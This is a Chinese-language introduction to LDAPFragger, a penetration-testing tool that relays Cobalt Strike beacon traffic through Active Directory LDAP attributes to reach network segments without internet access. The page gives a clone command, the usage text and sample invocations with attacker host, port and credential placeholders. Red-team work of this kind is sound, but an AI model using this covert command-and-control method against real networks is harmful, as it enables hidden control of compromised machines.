LDAPFragger:一款功能强大的命令控制C&C工具

2022-06-08 15:20:25 浏览数 (1)

关于LDAPFragger

LDAPFragger是一款功能强大的命令控制C&C工具,可以帮助广大研究人员使用用户属性和LDAP来路由Cobalt Strike信标数据。

在之前的一次针对组织内部网络的渗透测试过程中,我们遇到了物理分段网络。这些网络包含连接到同一活动目录域的工作站,但是只有一个网段可以连接到外网。为了使用Cobalt Strike远程控制这两个网段中的工作站,我们构建了一个工具,该工具使用共享活动目录组件来构建通信通道。为此,该工具使用了针对活动目录的LDAP协议,并且能够有效地通过LDAP路由信标数据。

构建高级LDAP信道

下图显示的是信道建立的处理流程:

依赖组件

该工具需要使用.NET 4.0进行编译,但理论上也可以使用其他版本的.NET Framework。

工具下载

广大研究人员可以使用下列命令将该项目源码克隆至本地:

代码语言:javascript复制
git clone https://github.com/fox-it/LDAPFragger.git

工具使用

代码语言:javascript复制
_     _              __

| |   | |            / _|

| | __| | __ _ _ __ | |_ _ __ __ _  __ _  __ _  ___ _ __

| |/ _` |/ _` | '_ |  _| '__/ _` |/ _` |/ _` |/ _  '__|

| | (_| | (_| | |_) | | | | | (_| | (_| | (_| |  __/ |

|_|__,_|__,_| .__/|_| |_|  __,_|__, |__, |___|_|

              | |                   __/ | __/ |

              |_|                  |___/ |___/



Fox-IT - Rindert Kramer



Usage:

     --cshost:  Cobalt Strike实例的IP地址或主机名

     --csport:  Cobalt Strike服务器的外部C2实例端口

     -u:        连接活动目录使用的用户名

     -p:        连接活动目录使用的密码

     -d:        活动目录域的FQDN

     --ldaps:    使用LDAPS代替LDAP

     -v:        Verbose输出模式

     -h:        显示工具帮助信息



If no AD credentials are provided, integrated AD authentication will be used.
 工具使用样例

从网段A运行下列命令:

代码语言:javascript复制
LDAPFragger --cshost <Cobalt Strike IP> --csport <External listener port>



LDAPFragger --cshost <Cobalt Strike IP> --csport <External listener port> -u <username> -p <password> -d <domain FQDN>

从网段B运行下列命令:

代码语言:javascript复制
LDAPFragger



LDAPFragger -u <username> -p <password> -d <domain FQDN>

我们可以通过“--LDAPS”选项来启用LDAPS,此时常规的LDAP流量仍然会被加密。注意,此时默认的Cobalt Strike Payload可能会被大多数AV捕捉到。

工具运行截图

许可证协议

本项目的开发与发布遵循MIT开源许可证协议。

项目地址

https://github.com/fox-it/LDAPFragger

参考资料

https://blog.fox-it.com/2020/03/19/ldapfragger-command-and-control-over-ldap-attributes/

https://docs.microsoft.com/en-us/windows/win32/adschema/r-personal-information

https://github.com/fox-it/LDAPFragger/blob/master/LDAPChannel.ps1

https://www.harmj0y.net/blog/powershell/command-and-control-using-active-directory/

https://www.cobaltstrike.com/help-externalc2

https://support.microsoft.com/en-us/help/314980/how-to-configure-active-directory-and-lds-diagnostic-event-logging

https://techcommunity.microsoft.com/t5/Microsoft-Defender-ATP/Hunting-for-reconnaissance-activities-using-LDAP-search-filters/ba-p/824726

0 人点赞